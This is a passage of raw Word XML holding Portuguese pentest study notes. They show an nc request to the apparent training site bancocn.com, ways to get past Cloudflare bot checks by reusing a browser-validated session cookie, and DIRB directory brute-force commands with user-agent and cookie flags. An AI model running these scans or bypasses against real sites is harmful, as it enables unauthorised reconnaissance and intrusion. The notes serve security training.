    <w:p w14:paraId="2F910450" w14:textId="77777777" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AFF54A" w14:textId="5AA9CB3B" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr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Se você fizer uma requisição pelo </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcast</w:t>
      </w:r>
      <w:r w:rsidR="00C21612" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C21612" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(nc)</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, utilizando o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">bancocn.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, retirando os cookies de sessão gerados pelo CloudFlare, passando somente o Host e o User-Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9118C0" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0528A2B8" w14:textId="5A143D89" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55898D9B" wp14:editId="552A57A8">
            <wp:extent cx="5400040" cy="724535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="243343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43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9872" w14:textId="77777777" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD102AE" w14:textId="467D5C04" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="006B76C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD5F9F9" wp14:editId="049E1894">
            <wp:extent cx="4926740" cy="3061252"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="1280407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7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5250" cy="307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46E0" w14:textId="1FF528DD" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vai retornar um erro </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D315B4B" w14:textId="77777777" w:rsidR="00E61922" w:rsidRPr="00711C8C" w:rsidRDefault="00E61922" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFDE448" w14:textId="314ADF78" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Porque?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61195180" w14:textId="3D37A619" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
        <w:t>Eu não passo nenhum cookie do cloudFlare, permitindo que eu acesse diretamente o bancocn.com;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B370F" w14:textId="77777777" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Eu não estou fazendo essa requisição através de um navegador que execute JavaScript. (O CloudFlare, ele não consegue fazer essa verificação se é um navegador real e gerar um cookie). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3932C3" w14:textId="77777777" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680F3182" w14:textId="6BFCA331" w:rsidR="008500FD" w:rsidRPr="00711C8C" w:rsidRDefault="008500FD" w:rsidP="00AF5760">
      <w:pPr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Então, para fazer essa requisição através do </w:t>
      </w:r>
      <w:r w:rsidRPr="00C409BC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetCast</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, eu tenho sempre que passar um cookie já validado pelo navegador. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D5737" w14:textId="77777777" w:rsidR="00C21612" w:rsidRPr="00711C8C" w:rsidRDefault="00C21612" w:rsidP="00C040C7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDC5956" w14:textId="3EE674D8" w:rsidR="00C040C7" w:rsidRPr="00711C8C" w:rsidRDefault="00C040C7" w:rsidP="00C040C7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Existem formas de burlar para gerar o cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1179A359" w14:textId="74E8CA32" w:rsidR="00C040C7" w:rsidRPr="00711C8C" w:rsidRDefault="00C040C7" w:rsidP="00C040C7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Por exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FFCA5" w14:textId="41ADDAC7" w:rsidR="00C040C7" w:rsidRPr="00711C8C" w:rsidRDefault="00947A7A" w:rsidP="00C040C7">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708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- </w:t>
      </w:r>
      <w:r w:rsidR="00C040C7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Criar um script em Python que acessa o navegador, acessa o bancocn.com, pega o cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B5848" w14:textId="0086B04E" w:rsidR="00354AE2" w:rsidRDefault="00947A7A" w:rsidP="00354AE2">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Direto nessa sessão gerado o cookie, realizar um ataque de diretórios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E01495" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00354AE2">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24590C18" w14:textId="650A2D2B" w:rsidR="00354AE2" w:rsidRPr="00B007BE" w:rsidRDefault="00354AE2" w:rsidP="00711C8C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc156597598"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A ferramenta </w:t>
      </w:r>
      <w:r w:rsidR="00C21612" w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIRB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3E83BA79" w14:textId="5FB85E48" w:rsidR="00C21612" w:rsidRPr="00711C8C" w:rsidRDefault="00C21612" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7163B959" w14:textId="01F096AF" w:rsidR="00805CA0" w:rsidRPr="00711C8C" w:rsidRDefault="00805CA0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Essa ferramenta serve para fazer um </w:t>
      </w:r>
      <w:r w:rsidR="00B93624" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">brute force de </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>scan de diretórios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4FECB7" w14:textId="20562299" w:rsidR="00B93624" w:rsidRPr="00711C8C" w:rsidRDefault="00B93624" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBC6F9C" w14:textId="587F4E2A" w:rsidR="00B93624" w:rsidRPr="00711C8C" w:rsidRDefault="00B93624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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Em um pentest real, você faz um brute force </w:t>
      </w:r>
      <w:r w:rsidR="00D40ED9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">durante </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>bastante</w:t>
      </w:r>
      <w:r w:rsidR="00D40ED9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> tempo</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> e com várias wordlists e até utilizar outras ferramentas mais elaboradas como um ataque de brute force em paralelo usando threads. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB3C41">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(deixa mais rápido)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BD1FD" w14:textId="77777777" w:rsidR="00805CA0" w:rsidRPr="00711C8C" w:rsidRDefault="00805CA0" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29064CF3" w14:textId="5B03BA0A" w:rsidR="00C21612" w:rsidRPr="00711C8C" w:rsidRDefault="00805CA0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Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="263B055C" w14:textId="6B8F82EE" w:rsidR="00FA4F9F" w:rsidRPr="00503986" w:rsidRDefault="00FA4F9F" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando com wordlist própria: </w:t>
      </w:r>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00503986">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /user/share/wordlists/…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25408707" w14:textId="50840367" w:rsidR="0092281B" w:rsidRPr="00711C8C" w:rsidRDefault="0092281B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Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://www.bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C05189" w14:textId="586F62D1" w:rsidR="00806D0F" w:rsidRPr="00711C8C" w:rsidRDefault="00806D0F" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-v -a “</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” -c “</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e2ftd2ute37n0tmov556v6n8u7</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1381E1" w14:textId="77777777" w:rsidR="0092281B" w:rsidRPr="00711C8C" w:rsidRDefault="0092281B" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DF8C57" w14:textId="747E6622" w:rsidR="0092281B" w:rsidRPr="00711C8C" w:rsidRDefault="0092281B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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Você consegue saber o status code retornado, se caso, não encontrar o diretório.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA8C4E" w14:textId="7F0E6D77" w:rsidR="009556D4" w:rsidRPr="00711C8C" w:rsidRDefault="009556D4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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-c </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Você consegue passar o cookies de sessão, para fazer requisição quando se há um firewall por trás.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EFEFD" w14:textId="6DF26233" w:rsidR="00806D0F" w:rsidRPr="00711C8C" w:rsidRDefault="00806D0F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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Você passa o User-Agent da requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E935E12" w14:textId="77777777" w:rsidR="00805CA0" w:rsidRPr="00711C8C" w:rsidRDefault="00805CA0" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185D2D35" w14:textId="54E463D5" w:rsidR="00805CA0" w:rsidRPr="00711C8C" w:rsidRDefault="00805CA0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Se tiver um firewall por trás da aplicação, todas as requisições serão barradas pelo firewall</w:t>
      </w:r>
      <w:r w:rsidR="001F7DCC" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, por exemplo, o próprio Cloudflar</w:t>
      </w:r>
      <w:r w:rsidR="00B93624" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CE42A" w14:textId="77777777" w:rsidR="00B93624" w:rsidRPr="00711C8C" w:rsidRDefault="00B93624" w:rsidP="00711C8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEEB5EB" w14:textId="5AED82F8" w:rsidR="00B93624" w:rsidRPr="00B007BE" w:rsidRDefault="00E957A6" w:rsidP="00711C8C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc156597599"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Banco de dados</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="78B91307" w14:textId="77777777" w:rsidR="006D4F3F" w:rsidRPr="00711C8C" w:rsidRDefault="006D4F3F" w:rsidP="00711C8C">
      <w:pPr>
